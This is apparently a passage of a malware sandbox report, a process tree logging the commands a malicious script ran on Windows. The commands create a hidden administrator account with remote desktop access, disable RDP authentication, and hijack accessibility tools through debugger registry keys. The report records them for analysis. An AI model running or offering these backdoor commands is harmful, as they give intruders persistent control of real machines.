      C:\Windows\system32\net1 localgroup Administrators ontar /add
      4⤵
      PID:468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    PID:2044
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:824
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:748
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" ontar /add
    3⤵
    PID:876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add
      4⤵
      PID:960
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    PID:1616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:1600
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d 0x0 /f
    3⤵
    - Modifies WinLogon
    PID:1804
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0" /v "Version" /t REG_DWORD /d "196611" /f
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "StartTimeLo" /t REG_DWORD /d "2386147405" /f
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "EndTimeLo" /t REG_DWORD /d "2387249407" /f
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0" /v "Version" /t REG_DWORD /d "196611" /f
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}" /v "LastPolicyTime" /t REG_DWORD /d "19856934" /f
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SYSTEM\ControlSet001\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe add "HKU\S-1-5-21-1252767878-4065156067-3399968500-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /v "P:\FUNER\Iveghny\Ertfubg.rkr" /t REG_BINARY /d "1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000" /f
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\users\ontar +r +a +s +h
    3⤵
    - Views/modifies file attributes
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    reg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList» /v ontar /t REG_DWORD /d «00000000" /f
    3⤵
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\SH.bat" "
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -h -s -r C:\Windows\system32\dllcache
    3⤵
    - Views/modifies file attributes
    PID:1876
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F C:\Windows\System32\sethc.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F C:\Windows\SysWOW64\sethc.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\dllcache\sethc.exe /G :F SYSTEM:F
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\dllcache\sethc.exe /G :F SYSTEM:F
    3⤵
    PID:552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:568
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1504
- C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe
  "C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe" -silent
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1784